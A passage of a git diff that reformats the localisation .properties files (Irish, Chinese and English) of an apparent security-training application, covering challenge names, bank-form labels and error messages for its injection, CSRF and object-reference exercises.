-category.unvalidated.redirects.and.forwards=Atreorú agus ar aghaidh nach bailíochtaithe
-category.xss=XSS
+broken.crypto = Briste Cripteagrafaíocht 
+broken.crypto.1 = Briste Cripteagrafaíocht  1
+broken.crypto.2 = Briste Cripteagrafaíocht  2
+broken.crypto.3 = Briste Cripteagrafaíocht  3
+broken.session.management = Briste Bainisteoireacht an tSeisiúin
+client.side.injection = Instealladh Taobh Cliaint 
+client.side.injection.1 = Instealladh Taobh Cliaint  1
+client.side.injection.2 = Instealladh Taobh Cliaint  2
+content.provider.leakage =  Soláthraí Sceitheadh Ábhair 
+cross.site.request.forgery = Trasna Suíomh Iarratas a Bhrionnú
+cross.site.scripting = Trasna Suíomh Scriptithe
+cross.site.scripting.1 = Trasna Suíomh Scriptithe 1
+cross.site.scripting.2 = Trasna Suíomh Scriptithe 2
+cross.site.scripting.3 = Trasna Suíomh Scriptithe 3
+cross.site.scripting.4 = Trasna Suíomh Scriptithe 4
+cross.site.scripting.5 = Trasna Suíomh Scriptithe 5
+cross.site.scripting.6 = Trasna Suíomh Scriptithe 6
+csrf.1 = CSRF 1
+csrf.2 = CSRF 2
+csrf.3 = CSRF 3
+csrf.4 = CSRF 4
+csrf.5 = CSRF 5
+csrf.6 = CSRF 6
+csrf.7 = CSRF 7
+csrf.json = CSRF JSON
+failure.to.restrict.url.access = Neamhghnímh a Srian Rochtain a URL
+failure.to.restrict.url.access.1 = Neamhghnímh a Srian Rochtain a URL 1
+failure.to.restrict.url.access.2 = Neamhghnímh a Srian Rochtain a URL 2
+failure.to.restrict.url.access.3 = Neamhghnímh a Srian Rochtain a URL 3
+insecure.cryptographic.storage = Éadaingean Cripteagrafaíocht Stóráil
+insecure.cryptographic.storage.challenge.1 = Éadaingean Cripteagrafaíocht Stóráil 1
+insecure.cryptographic.storage.challenge.2 = Éadaingean Cripteagrafaíocht Stóráil 2
+insecure.cryptographic.storage.challenge.3 = Éadaingean Cripteagrafaíocht Stóráil 3
+insecure.cryptographic.storage.challenge.4 = Éadaingean Cripteagrafaíocht Stóráil 4
+insecure.data.storage = Éadaingean Sonraí Stóráil
+insecure.data.storage.1 = Éadaingean Sonraí Stóráil 1
+insecure.data.storage.2 = Éadaingean Sonraí Stóráil 2
+insecure.data.storage.3 = Éadaingean Sonraí Stóráil 3
+insecure.direct.object.reference.bank = Éadaingean Dír-Oibiacht Tagairt Banc
+insecure.direct.object.reference.challenge.1 = Éadaingean Dír-Oibiacht Tagairt 1
+insecure.direct.object.reference.challenge.2 = Éadaingean Dír-Oibiacht Tagairt 2
+insecure.direct.object.references = Éadaingean Dír-Oibiacht Tagairt
+nosql.injection.one = NoSQL Instealladh 1
+poor.authentication = Droch Fhíordheimhniú
+poor.authentication.1 = Droch Fhíordheimhniú 1
+poor.data.validation = Droch Bailíochtú Sonraí
+poor.data.validation.1 = Droch Bailíochtú Sonraí 1
+poor.data.validation.2 = Droch Bailíochtú Sonraí 2
+reverse.engineering = Droim ar ais Innealtóireacht
+reverse.engineering.1 = Innealtóireacht Droim ar ais  1
+reverse.engineering.2 = Innealtóireacht Droim ar ais 2
+reverse.engineering.3 = Innealtóireacht Droim ar ais 3
+security.misconfig.cookie.flag = Nach bhfuil slándáil chórais cumraithe mar is ceart Fianán Bratach
+security.misconfiguration = Nach bhfuil slándáil chórais cumraithe mar is ceart
+session.management.challenge.1 = Bainisteoireacht an tSeisiúin 1
+session.management.challenge.2 = Bainisteoireacht an tSeisiúin 2
+session.management.challenge.3 = Bainisteoireacht an tSeisiúin 3
+session.management.challenge.4 = Bainisteoireacht an tSeisiúin 4
+session.management.challenge.5 = Bainisteoireacht an tSeisiúin 5
+session.management.challenge.6 = Bainisteoireacht an tSeisiúin 6
+session.management.challenge.7 = Bainisteoireacht an tSeisiúin 7
+session.management.challenge.8 = Bainisteoireacht an tSeisiúin 8
+sql.injection = SQL Instealladh
+sql.injection.1 = SQL Instealladh 1
+sql.injection.2 = SQL Instealladh 2
+sql.injection.3 = SQL Instealladh 3
+sql.injection.4 = SQL Instealladh 4
+sql.injection.5 = SQL Instealladh 5
+sql.injection.6 = SQL Instealladh 6
+sql.injection.7 = SQL Instealladh 7
+sql.injection.escaping = SQL Instealladh éalúcháin
+sql.injection.stored.procedure = SQL Instealladh stóráilte gníomh
+unintended.data.leakage = Neamhbheartaithe Sonraí Sceitheadh
+unintended.data.leakage.1 = Neamhbheartaithe Sonraí Sceitheadh 1
+unintended.data.leakage.2 = Neamhbheartaithe Sonraí Sceitheadh 2
+unvalidated.redirects.and.forwards = Atreorú agus ar aghaidh nach bailíochtaithe
+
+category.csrf = CSRF
+category.failure.to.restrict.url.access = Neamhghnímh a Srian Rochtain a URL
+category.injection = Instealladh
+category.insecure.cryptographic.storage = Éadaingean Cripteagrafaíocht Stóráil
+category.insecure.direct.object.references = Éadaingean Dír-Oibiacht Tagairt
+category.mobile.broken.crypto = Móibíleacha Briste Cripteagrafaíocht
+category.mobile.content.providers = Móibíleacha Soláthraithe Ábhar
+category.mobile.data.leakage = Móibíleacha Sonraí Sceitheadh
+category.mobile.injection = Móibíleacha Instealladh
+category.mobile.insecure.data.storage = Móibíleacha Éadaingean Sonraí Stóráil
+category.mobile.poor.authentication = Móibíleacha Droch Fhíordheimhniú
+category.mobile.reverse.engineering = Móibíleacha Innealtóireacht Droim ar ais
+category.poor.data.validation = Droch Bailíochtú Sonraí
+category.security.misconfigurations = Nach bhfuil slándáil chórais cumraithe mar is ceart
+category.session.management = Bainisteoireacht an tSeisiúin
+category.unvalidated.redirects.and.forwards = Atreorú agus ar aghaidh nach bailíochtaithe
+category.xss = XSS
diff --git a/src/main/resources/i18n/moduleGenerics/moduleNames_zh.properties b/src/main/resources/i18n/moduleGenerics/moduleNames_zh.properties
index 5a822ad0f..ff909b938 100644
--- a/src/main/resources/i18n/moduleGenerics/moduleNames_zh.properties
+++ b/src/main/resources/i18n/moduleGenerics/moduleNames_zh.properties
@@ -1,94 +1,95 @@
-broken.crypto=\u5931\u6548\u52A0\u5BC6
-broken.crypto.1=\u5931\u6548\u52A0\u5BC6 1
-broken.crypto.2=\u5931\u6548\u52A0\u5BC6 2
-broken.crypto.3=\u5931\u6548\u52A0\u5BC6 3
-broken.session.management=\u5931\u6548\u7684\u4F1A\u8BDD\u7BA1\u7406
-client.side.injection=\u5BA2\u6237\u7AEF\u6CE8\u5165
-client.side.injection.1=\u5BA2\u6237\u7AEF\u6CE8\u5165 1
-client.side.injection.2=\u5BA2\u6237\u7AEF\u6CE8\u5165 2
-content.provider.leakage=\u5185\u5BB9\u63D0\u4F9B\u8005\u6CC4\u6F0F
-cross.site.request.forgery=\u8DE8\u7AD9\u8BF7\u6C42\u4F2A\u9020 (CSRF)
-cross.site.scripting=\u8DE8\u7AD9\u811A\u672C (XSS)
-cross.site.scripting.1=\u8DE8\u7AD9\u811A\u672C (XSS) 1
-cross.site.scripting.2=\u8DE8\u7AD9\u811A\u672C (XSS)2
-cross.site.scripting.3=\u8DE8\u7AD9\u811A\u672C (XSS)3
-cross.site.scripting.4=\u8DE8\u7AD9\u811A\u672C (XSS)4
-cross.site.scripting.5=\u8DE8\u7AD9\u811A\u672C (XSS)5
-cross.site.scripting.6=\u8DE8\u7AD9\u811A\u672C (XSS)6
-csrf.1=\u8DE8\u7AD9\u8BF7\u6C42\u4F2A\u9020 (CSRF) 1
-csrf.2=\u8DE8\u7AD9\u8BF7\u6C42\u4F2A\u9020 (CSRF) 2
-csrf.3=\u8DE8\u7AD9\u8BF7\u6C42\u4F2A\u9020 (CSRF) 3
-csrf.4=\u8DE8\u7AD9\u8BF7\u6C42\u4F2A\u9020 (CSRF) 4
-csrf.5=\u8DE8\u7AD9\u8BF7\u6C42\u4F2A\u9020 (CSRF) 5
-csrf.6=\u8DE8\u7AD9\u8BF7\u6C42\u4F2A\u9020 (CSRF) 6
-csrf.7=\u8DE8\u7AD9\u8BF7\u6C42\u4F2A\u9020 (CSRF) 7
-csrf.json=\u8DE8\u7AD9\u8BF7\u6C42\u4F2A\u9020 JSON (CSRF JSON)
-failure.to.restrict.url.access=\u6CA1\u6709\u9650\u5236URL\u8BBF\u95EE
-failure.to.restrict.url.access.1=\u6CA1\u6709\u9650\u5236URL\u8BBF\u95EE 1
-failure.to.restrict.url.access.2=\u6CA1\u6709\u9650\u5236URL\u8BBF\u95EE 2
-failure.to.restrict.url.access.3=\u6CA1\u6709\u9650\u5236URL\u8BBF\u95EE 3
-insecure.cryptographic.storage=\u4E0D\u5B89\u5168\u7684\u52A0\u5BC6\u5B58\u50A8
-insecure.cryptographic.storage.challenge.1=\u4E0D\u5B89\u5168\u7684\u52A0\u5BC6\u5B58\u50A8 1
-insecure.cryptographic.storage.challenge.2=\u4E0D\u5B89\u5168\u7684\u52A0\u5BC6\u5B58\u50A8 2
-insecure.cryptographic.storage.challenge.3=\u4E0D\u5B89\u5168\u7684\u52A0\u5BC6\u5B58\u50A8 3
-insecure.cryptographic.storage.challenge.4=\u4E0D\u5B89\u5168\u7684\u52A0\u5BC6\u5B58\u50A8 4
-insecure.data.storage=\u4E0D\u5B89\u5168\u7684\u6570\u636E\u5B58\u50A8
-insecure.data.storage.1=\u4E0D\u5B89\u5168\u7684\u6570\u636E\u5B58\u50A8 1
-insecure.data.storage.2=\u4E0D\u5B89\u5168\u7684\u6570\u636E\u5B58\u50A8 2
-insecure.data.storage.3=\u4E0D\u5B89\u5168\u7684\u6570\u636E\u5B58\u50A8 3
-insecure.direct.object.reference.bank=\u94F6\u884C\u4E0D\u5B89\u5168\u7684\u76F4\u63A5\u5BF9\u8C61\u5F15\u7528
-insecure.direct.object.reference.challenge.1=\u4E0D\u5B89\u5168\u7684\u76F4\u63A5\u5BF9\u8C61\u5F15\u7528 1
-insecure.direct.object.reference.challenge.2=\u4E0D\u5B89\u5168\u7684\u76F4\u63A5\u5BF9\u8C61\u5F15\u7528 2
-insecure.direct.object.references=\u4E0D\u5B89\u5168\u7684\u76F4\u63A5\u5BF9\u8C61\u5F15\u7528
-nosql.injection.one=NoSQL \u6CE8\u5165 1
-poor.authentication=\u5931\u6548\u7684\u8EAB\u4EFD\u8BA4\u8BC1
-poor.authentication.1=\u5931\u6548\u7684\u8EAB\u4EFD\u8BA4\u8BC1 1
-poor.data.validation=\u5931\u6548\u7684\u6570\u636E\u8BA4\u8BC1
-poor.data.validation.1=\u5931\u6548\u7684\u6570\u636E\u8BA4\u8BC1 1
-poor.data.validation.2=\u5931\u6548\u7684\u6570\u636E\u8BA4\u8BC1 2
-reverse.engineering=\u9006\u5411\u5DE5\u7A0B
-reverse.engineering.1=\u9006\u5411\u5DE5\u7A0B 1
-reverse.engineering.2=\u9006\u5411\u5DE5\u7A0B 2
-reverse.engineering.3=\u9006\u5411\u5DE5\u7A0B 3
-security.misconfig.cookie.flag=\u5B89\u5168\u6027\u8BBE\u5B9A\u7F3A\u5931 Cookie \u6807\u5FD7
-security.misconfiguration=\u5B89\u5168\u6027\u8BBE\u5B9A\u7F3A\u5931
-session.management.challenge.1=\u4F1A\u8BDD\u7BA1\u7406 1
-session.management.challenge.2=\u4F1A\u8BDD\u7BA1\u7406 2
-session.management.challenge.3=\u4F1A\u8BDD\u7BA1\u7406 3
-session.management.challenge.4=\u4F1A\u8BDD\u7BA1\u7406 4
-session.management.challenge.5=\u4F1A\u8BDD\u7BA1\u7406 5
-session.management.challenge.6=\u4F1A\u8BDD\u7BA1\u7406 6
-session.management.challenge.7=\u4F1A\u8BDD\u7BA1\u7406 7
-session.management.challenge.8=\u4F1A\u8BDD\u7BA1\u7406 8
-sql.injection=SQL \u6CE8\u5165
-sql.injection.1=SQL \u6CE8\u5165 1
-sql.injection.2=SQL \u6CE8\u5165 2
-sql.injection.3=SQL \u6CE8\u5165 3
-sql.injection.4=SQL \u6CE8\u5165 4
-sql.injection.5=SQL \u6CE8\u5165 5
-sql.injection.6=SQL \u6CE8\u5165 6
-sql.injection.7=SQL \u6CE8\u5165 7
-sql.injection.escaping=SQL \u6CE8\u5165\u8F6C\u4E49
-sql.injection.stored.procedure=SQL \u6CE8\u5165\u50A8\u5B58\u7A0B\u5E8F
-unintended.data.leakage=\u610F\u5916\u6570\u636E\u6CC4\u6F0F
-unintended.data.leakage.1=\u610F\u5916\u6570\u636E\u6CC4\u6F0F 1
-unintended.data.leakage.2=\u610F\u5916\u6570\u636E\u6CC4\u6F0F 2
-unvalidated.redirects.and.forwards=\u672A\u9A8C\u8BC1\u7684\u91CD\u5B9A\u5411\u548C\u8F6C\u53D1
-category.csrf=\u8DE8\u7AD9\u8BF7\u6C42\u4F2A\u9020 (CSRF)
-category.failure.to.restrict.url.access=\u6CA1\u6709\u9650\u5236URL\u8BBF\u95EE
-category.injection=\u6CE8\u5165
-category.insecure.cryptographic.storage=\u4E0D\u5B89\u5168\u7684\u52A0\u5BC6\u5B58\u50A8
-category.insecure.direct.object.references=\u4E0D\u5B89\u5168\u7684\u76F4\u63A5\u5BF9\u5F15\u7528
-category.mobile.broken.crypto=\u79FB\u52A8\u52A0\u5BC6\u5931\u6548
-category.mobile.content.providers=Mobile Content Providers
-category.mobile.data.leakage=\u79FB\u52A8\u6570\u636E\u6CC4\u9732
-category.mobile.injection=\u79FB\u52A8\u6CE8\u5165
-category.mobile.insecure.data.storage=\u79FB\u52A8\u4E0D\u5B89\u5168\u7684\u6570\u636E\u5B58\u50A8
-category.mobile.poor.authentication=\u79FB\u52A8\u5931\u6548\u7684\u8BA4\u8BC1
-category.mobile.reverse.engineering=\u79FB\u52A8\u9006\u5411\u5DE5\u7A0B
-category.poor.data.validation=\u5931\u6548\u7684\u8EAB\u4EFD\u8BA4\u8BC1
-category.security.misconfigurations=\u5B89\u5168\u6027\u8BBE\u5B9A\u7F3A\u5931
-category.session.management=\u4F1A\u8BDD\u7BA1\u7406
-category.unvalidated.redirects.and.forwards=\u672A\u9A8C\u8BC1\u7684\u91CD\u5B9A\u5411\u548C\u8F6C\u53D1
-category.xss=\u8DE8\u7AD9\u811A\u672C (XSS)
+broken.crypto = \u5931\u6548\u52A0\u5BC6
+broken.crypto.1 = \u5931\u6548\u52A0\u5BC6 1
+broken.crypto.2 = \u5931\u6548\u52A0\u5BC6 2
+broken.crypto.3 = \u5931\u6548\u52A0\u5BC6 3
+broken.session.management = \u5931\u6548\u7684\u4F1A\u8BDD\u7BA1\u7406
+client.side.injection = \u5BA2\u6237\u7AEF\u6CE8\u5165
+client.side.injection.1 = \u5BA2\u6237\u7AEF\u6CE8\u5165 1
+client.side.injection.2 = \u5BA2\u6237\u7AEF\u6CE8\u5165 2
+content.provider.leakage = \u5185\u5BB9\u63D0\u4F9B\u8005\u6CC4\u6F0F
+cross.site.request.forgery = \u8DE8\u7AD9\u8BF7\u6C42\u4F2A\u9020 (CSRF)
+cross.site.scripting = \u8DE8\u7AD9\u811A\u672C (XSS)
+cross.site.scripting.1 = \u8DE8\u7AD9\u811A\u672C (XSS) 1
+cross.site.scripting.2 = \u8DE8\u7AD9\u811A\u672C (XSS)2
+cross.site.scripting.3 = \u8DE8\u7AD9\u811A\u672C (XSS)3
+cross.site.scripting.4 = \u8DE8\u7AD9\u811A\u672C (XSS)4
+cross.site.scripting.5 = \u8DE8\u7AD9\u811A\u672C (XSS)5
+cross.site.scripting.6 = \u8DE8\u7AD9\u811A\u672C (XSS)6
+csrf.1 = \u8DE8\u7AD9\u8BF7\u6C42\u4F2A\u9020 (CSRF) 1
+csrf.2 = \u8DE8\u7AD9\u8BF7\u6C42\u4F2A\u9020 (CSRF) 2
+csrf.3 = \u8DE8\u7AD9\u8BF7\u6C42\u4F2A\u9020 (CSRF) 3
+csrf.4 = \u8DE8\u7AD9\u8BF7\u6C42\u4F2A\u9020 (CSRF) 4
+csrf.5 = \u8DE8\u7AD9\u8BF7\u6C42\u4F2A\u9020 (CSRF) 5
+csrf.6 = \u8DE8\u7AD9\u8BF7\u6C42\u4F2A\u9020 (CSRF) 6
+csrf.7 = \u8DE8\u7AD9\u8BF7\u6C42\u4F2A\u9020 (CSRF) 7
+csrf.json = \u8DE8\u7AD9\u8BF7\u6C42\u4F2A\u9020 JSON (CSRF JSON)
+failure.to.restrict.url.access = \u6CA1\u6709\u9650\u5236URL\u8BBF\u95EE
+failure.to.restrict.url.access.1 = \u6CA1\u6709\u9650\u5236URL\u8BBF\u95EE 1
+failure.to.restrict.url.access.2 = \u6CA1\u6709\u9650\u5236URL\u8BBF\u95EE 2
+failure.to.restrict.url.access.3 = \u6CA1\u6709\u9650\u5236URL\u8BBF\u95EE 3
+insecure.cryptographic.storage = \u4E0D\u5B89\u5168\u7684\u52A0\u5BC6\u5B58\u50A8
+insecure.cryptographic.storage.challenge.1 = \u4E0D\u5B89\u5168\u7684\u52A0\u5BC6\u5B58\u50A8 1
+insecure.cryptographic.storage.challenge.2 = \u4E0D\u5B89\u5168\u7684\u52A0\u5BC6\u5B58\u50A8 2
+insecure.cryptographic.storage.challenge.3 = \u4E0D\u5B89\u5168\u7684\u52A0\u5BC6\u5B58\u50A8 3
+insecure.cryptographic.storage.challenge.4 = \u4E0D\u5B89\u5168\u7684\u52A0\u5BC6\u5B58\u50A8 4
+insecure.data.storage = \u4E0D\u5B89\u5168\u7684\u6570\u636E\u5B58\u50A8
+insecure.data.storage.1 = \u4E0D\u5B89\u5168\u7684\u6570\u636E\u5B58\u50A8 1
+insecure.data.storage.2 = \u4E0D\u5B89\u5168\u7684\u6570\u636E\u5B58\u50A8 2
+insecure.data.storage.3 = \u4E0D\u5B89\u5168\u7684\u6570\u636E\u5B58\u50A8 3
+insecure.direct.object.reference.bank = \u94F6\u884C\u4E0D\u5B89\u5168\u7684\u76F4\u63A5\u5BF9\u8C61\u5F15\u7528
+insecure.direct.object.reference.challenge.1 = \u4E0D\u5B89\u5168\u7684\u76F4\u63A5\u5BF9\u8C61\u5F15\u7528 1
+insecure.direct.object.reference.challenge.2 = \u4E0D\u5B89\u5168\u7684\u76F4\u63A5\u5BF9\u8C61\u5F15\u7528 2
+insecure.direct.object.references = \u4E0D\u5B89\u5168\u7684\u76F4\u63A5\u5BF9\u8C61\u5F15\u7528
+nosql.injection.one = NoSQL \u6CE8\u5165 1
+poor.authentication = \u5931\u6548\u7684\u8EAB\u4EFD\u8BA4\u8BC1
+poor.authentication.1 = \u5931\u6548\u7684\u8EAB\u4EFD\u8BA4\u8BC1 1
+poor.data.validation = \u5931\u6548\u7684\u6570\u636E\u8BA4\u8BC1
+poor.data.validation.1 = \u5931\u6548\u7684\u6570\u636E\u8BA4\u8BC1 1
+poor.data.validation.2 = \u5931\u6548\u7684\u6570\u636E\u8BA4\u8BC1 2
+reverse.engineering = \u9006\u5411\u5DE5\u7A0B
+reverse.engineering.1 = \u9006\u5411\u5DE5\u7A0B 1
+reverse.engineering.2 = \u9006\u5411\u5DE5\u7A0B 2
+reverse.engineering.3 = \u9006\u5411\u5DE5\u7A0B 3
+security.misconfig.cookie.flag = \u5B89\u5168\u6027\u8BBE\u5B9A\u7F3A\u5931 Cookie \u6807\u5FD7
+security.misconfiguration = \u5B89\u5168\u6027\u8BBE\u5B9A\u7F3A\u5931
+session.management.challenge.1 = \u4F1A\u8BDD\u7BA1\u7406 1
+session.management.challenge.2 = \u4F1A\u8BDD\u7BA1\u7406 2
+session.management.challenge.3 = \u4F1A\u8BDD\u7BA1\u7406 3
+session.management.challenge.4 = \u4F1A\u8BDD\u7BA1\u7406 4
+session.management.challenge.5 = \u4F1A\u8BDD\u7BA1\u7406 5
+session.management.challenge.6 = \u4F1A\u8BDD\u7BA1\u7406 6
+session.management.challenge.7 = \u4F1A\u8BDD\u7BA1\u7406 7
+session.management.challenge.8 = \u4F1A\u8BDD\u7BA1\u7406 8
+sql.injection = SQL \u6CE8\u5165
+sql.injection.1 = SQL \u6CE8\u5165 1
+sql.injection.2 = SQL \u6CE8\u5165 2
+sql.injection.3 = SQL \u6CE8\u5165 3
+sql.injection.4 = SQL \u6CE8\u5165 4
+sql.injection.5 = SQL \u6CE8\u5165 5
+sql.injection.6 = SQL \u6CE8\u5165 6
+sql.injection.7 = SQL \u6CE8\u5165 7
+sql.injection.escaping = SQL \u6CE8\u5165\u8F6C\u4E49
+sql.injection.stored.procedure = SQL \u6CE8\u5165\u50A8\u5B58\u7A0B\u5E8F
+unintended.data.leakage = \u610F\u5916\u6570\u636E\u6CC4\u6F0F
+unintended.data.leakage.1 = \u610F\u5916\u6570\u636E\u6CC4\u6F0F 1
+unintended.data.leakage.2 = \u610F\u5916\u6570\u636E\u6CC4\u6F0F 2
+unvalidated.redirects.and.forwards = \u672A\u9A8C\u8BC1\u7684\u91CD\u5B9A\u5411\u548C\u8F6C\u53D1
+
+category.csrf = \u8DE8\u7AD9\u8BF7\u6C42\u4F2A\u9020 (CSRF)
+category.failure.to.restrict.url.access = \u6CA1\u6709\u9650\u5236URL\u8BBF\u95EE
+category.injection = \u6CE8\u5165
+category.insecure.cryptographic.storage = \u4E0D\u5B89\u5168\u7684\u52A0\u5BC6\u5B58\u50A8
+category.insecure.direct.object.references = \u4E0D\u5B89\u5168\u7684\u76F4\u63A5\u5BF9\u5F15\u7528
+category.mobile.broken.crypto = \u79FB\u52A8\u52A0\u5BC6\u5931\u6548
+category.mobile.content.providers = Mobile Content Providers
+category.mobile.data.leakage = \u79FB\u52A8\u6570\u636E\u6CC4\u9732
+category.mobile.injection = \u79FB\u52A8\u6CE8\u5165
+category.mobile.insecure.data.storage = \u79FB\u52A8\u4E0D\u5B89\u5168\u7684\u6570\u636E\u5B58\u50A8
+category.mobile.poor.authentication = \u79FB\u52A8\u5931\u6548\u7684\u8BA4\u8BC1
+category.mobile.reverse.engineering = \u79FB\u52A8\u9006\u5411\u5DE5\u7A0B
+category.poor.data.validation = \u5931\u6548\u7684\u8EAB\u4EFD\u8BA4\u8BC1
+category.security.misconfigurations = \u5B89\u5168\u6027\u8BBE\u5B9A\u7F3A\u5931
+category.session.management = \u4F1A\u8BDD\u7BA1\u7406
+category.unvalidated.redirects.and.forwards = \u672A\u9A8C\u8BC1\u7684\u91CD\u5B9A\u5411\u548C\u8F6C\u53D1
+category.xss = \u8DE8\u7AD9\u811A\u672C (XSS)
 
diff --git a/src/main/resources/i18n/servlets/challenges/csrf/csrfGenerics.properties b/src/main/resources/i18n/servlets/challenges/csrf/csrfGenerics.properties
index bfbac349f..19f23095d 100644
--- a/src/main/resources/i18n/servlets/challenges/csrf/csrfGenerics.properties
+++ b/src/main/resources/i18n/servlets/challenges/csrf/csrfGenerics.properties
@@ -1,10 +1,12 @@
-target.noTokenNewToken=No CSRF Token Detected for this Challenge. Your token is now
-target.incrementSuccess=Increment Successful
-target.incrementFailed=Increment Failed
-target.noSession=No Session Detected
-forum.userName=User Name
-forum.image=Image
-forum.message=Message
-error.occurred=Sorry! An Error Occurred. Please contact administrator
-error.noClass=You must be assigned to a class to use this function. Please contact your administrator.
-error.noToken=Was unable to retrieve CSRF Token. Funky
+target.noTokenNewToken = No CSRF Token Detected for this Challenge. Your token is now
+target.incrementSuccess = Increment Successful
+target.incrementFailed = Increment Failed
+target.noSession = No Session Detected
+
+forum.userName = User Name
+forum.image = Image
+forum.message = Message
+
+error.occurred = Sorry! An Error Occurred. Please contact administrator
+error.noClass = You must be assigned to a class to use this function. Please contact your administrator.
+error.noToken = Was unable to retrieve CSRF Token. Funky
diff --git a/src/main/resources/i18n/servlets/challenges/directObject/directObjectBank.properties b/src/main/resources/i18n/servlets/challenges/directObject/directObjectBank.properties
index 270b1598c..e4f5aac4d 100644
--- a/src/main/resources/i18n/servlets/challenges/directObject/directObjectBank.properties
+++ b/src/main/resources/i18n/servlets/challenges/directObject/directObjectBank.properties
@@ -1,27 +1,32 @@
-login.authFailedMessage.1=ERROR: User
-login.authFailedMessage.2=could not be logged in
-login.error.couldNotGetBalance=Could not get Balance!
-bankForm.yourAccount=Your Account
-bankForm.yourAccount.balance=Your account balance is currently:
-bankForm.transferFunds=Transfer Funds
-bankForm.transferFunds.whatToDo=Use this form to send money to other accounts in this bank. All you need to do is enter their account number and the amount you want to send!
-bankForm.recieverNumber=Receiver Account Number:
-bankForm.amountToSend=Amount to Send:
-bankForm.loading=Loading...
-bankForm.refreshBalance=Refresh Balance
-bankForm.refreshBalance.whatToDo=Use this form to refresh your balance above. That way you can see if any money came in recently!
-bankForm.logoutOfAccount=Logout of Account
-bankForm.logoutOfAccount.whatToDo=Use this form to sign out of your bank account when your done giving your money away.
-bankForm.logoutFromBankAccount=Log Out Of Bank Account
-result.complete=Challenge Complete
-result.wellDone=Congratulations, you have successfully completed this challenge. Use the following result key at the top of the page to mark this level as complete in the system.
-result.theKeyIs=The result key for this challenge is
-logout.loggedOut=Logged Out
-register.accountCreated=User account has been registered! Please Sign in!
-register.error=Could not create account!
-transfer.error.couldNotTransfer=Could not get Transfer Funds!
-transfer.error.notEnoughCash=Your account does not have the necessary funds to transfer that amount.
-transfer.error.moreThanZero=The amount being transfered must be greater than zero.
-transfer.error.recieverNotFound=The receiver account specified could not be found
-transfer.error.occurred=An Error Occurred:
-transfer.success=Funds have been transfered successfully!
\ No newline at end of file
+login.authFailedMessage.1 = ERROR: User
+login.authFailedMessage.2 = could not be logged in
+login.error.couldNotGetBalance = Could not get Balance!
+
+bankForm.yourAccount = Your Account
+bankForm.yourAccount.balance = Your account balance is currently:
+bankForm.transferFunds = Transfer Funds
+bankForm.transferFunds.whatToDo = Use this form to send money to other accounts in this bank. All you need to do is enter their account number and the amount you want to send!
+bankForm.recieverNumber = Receiver Account Number:
+bankForm.amountToSend = Amount to Send:
+bankForm.loading = Loading...
+bankForm.refreshBalance = Refresh Balance
+bankForm.refreshBalance.whatToDo = Use this form to refresh your balance above. That way you can see if any money came in recently!
+bankForm.logoutOfAccount = Logout of Account
+bankForm.logoutOfAccount.whatToDo = Use this form to sign out of your bank account when your done giving your money away.
+bankForm.logoutFromBankAccount = Log Out Of Bank Account
+
+result.complete = Challenge Complete
+result.wellDone = Congratulations, you have successfully completed this challenge. Use the following result key at the top of the page to mark this level as complete in the system.
+result.theKeyIs = The result key for this challenge is
+
+logout.loggedOut = Logged Out
+
+register.accountCreated = User account has been registered! Please Sign in!
+register.error = Could not create account!
+
+transfer.error.couldNotTransfer = Could not get Transfer Funds!
+transfer.error.notEnoughCash = Your account does not have the necessary funds to transfer that amount.
+transfer.error.moreThanZero = The amount being transfered must be greater than zero.
+transfer.error.recieverNotFound = The receiver account specified could not be found
+transfer.error.occurred = An Error Occurred:
+transfer.success = Funds have been transfered successfully!
\ No newline at end of file
diff --git a/src/main/resources/i18n/servlets/challenges/directObject/directObjectRef1.properties b/src/main/resources/i18n/servlets/challenges/directObject/directObjectRef1.properties
index d2a827b8e..ef746d2a9 100644
--- a/src/main/resources/i18n/servlets/challenges/directObject/directObjectRef1.properties
+++ b/src/main/resources/i18n/servlets/challenges/directObject/directObjectRef1.properties
@@ -1,4 +1,4 @@
-response.message=Message
-response.notFound=User: 404 - User Not Found
-response.notFoundMessage.1=User
-response.notFoundMessage.2=could not be found or does not exist.
\ No newline at end of file
+response.message = Message
+response.notFound = User: 404 - User Not Found
+response.notFoundMessage.1 = User
+response.notFoundMessage.2 = could not be found or does not exist.
\ No newline at end of file
diff --git a/src/main/resources/i18n/servlets/challenges/directObject/directObjectRef2.properties b/src/main/resources/i18n/servlets/challenges/directObject/directObjectRef2.properties
index d2a827b8e..ef746d2a9 100644
--- a/src/main/resources/i18n/servlets/challenges/directObject/directObjectRef2.properties
+++ b/src/main/resources/i18n/servlets/challenges/directObject/directObjectRef2.properties
@@ -1,4 +1,4 @@
-response.message=Message
-response.notFound=User: 404 - User Not Found
-response.notFoundMessage.1=User
-response.notFoundMessage.2=could not be found or does not exist.
\ No newline at end of file
+response.message = Message
+response.notFound = User: 404 - User Not Found
+response.notFoundMessage.1 = User
+response.notFoundMessage.2 = could not be found or does not exist.
\ No newline at end of file
diff --git a/src/main/resources/i18n/servlets/challenges/injection/nosql.properties b/src/main/resources/i18n/servlets/challenges/injection/nosql.properties
index 91469e8ef..3598bb1dc 100644
--- a/src/main/resources/i18n/servlets/challenges/injection/nosql.properties
+++ b/src/main/resources/i18n/servlets/challenges/injection/nosql.properties
@@ -1,3 +1,3 @@
-results.queryResult=Mongodb Query Results
-result.none=There were no results found in your search
-result.mongoError=MongoDb Error caught - 
\ No newline at end of file
+results.queryResult = Mongodb Query Results
+result.none = There were no results found in your search
+result.mongoError = MongoDb Error caught - 
\ No newline at end of file
diff --git a/src/main/resources/i18n/servlets/challenges/injection/xxe1.properties b/src/main/resources/i18n/servlets/challenges/injection/xxe1.properties
index 6bc95c945..9a512bea0 100644
--- a/src/main/resources/i18n/servlets/challenges/injection/xxe1.properties
+++ b/src/main/resources/i18n/servlets/challenges/injection/xxe1.properties
@@ -1,3 +1,3 @@
-response.invalid.email=Invalid email address
-response.blank.email=Email must not be blank
-response.success.reset=The password has been reset for
\ No newline at end of file
+response.invalid.email = Invalid email address
+response.blank.email = Email must not be blank
+response.success.reset = The password has been reset for
\ No newline at end of file
diff --git a/src/main/resources/i18n/servlets/challenges/insecureCryptoStorage/insecureCryptoStorage.properties b/src/main/resources/i18n/servlets/challenges/insecureCryptoStorage/insecureCryptoStorage.properties
index 5459d818a..ba498b4a1 100644
--- a/src/main/resources/i18n/servlets/challenges/insecureCryptoStorage/insecureCryptoStorage.properties
+++ b/src/main/resources/i18n/servlets/challenges/insecureCryptoStorage/insecureCryptoStorage.properties
@@ -1,16 +1,19 @@
-insecureCryptoStorage.3.plaintextResult=Plain text Result:
-insecureCryptoStorage.3.plaintextResult.message=Your cipher text was decrypted to the following:
-insecureCryptoStorage.4.orderComplete=Order Complete
